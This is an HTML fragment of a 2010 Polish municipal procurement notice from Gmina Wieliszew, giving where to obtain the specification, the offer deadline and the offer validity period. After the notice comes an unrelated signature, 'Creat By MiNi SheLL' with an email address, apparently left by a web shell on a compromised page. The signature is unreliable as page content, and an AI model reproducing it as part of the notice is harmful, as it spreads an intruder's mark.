<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wieliszew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wieliszew ul. Modlińska 1 , 05-135 Wieliszew , Referat Inwestycji i Rozwoju Gminy , pokój 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 10:00, miejsce: Urząd Gminy Wieliszew ul. Modlińska 1  , 05-135 Wieliszew , Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com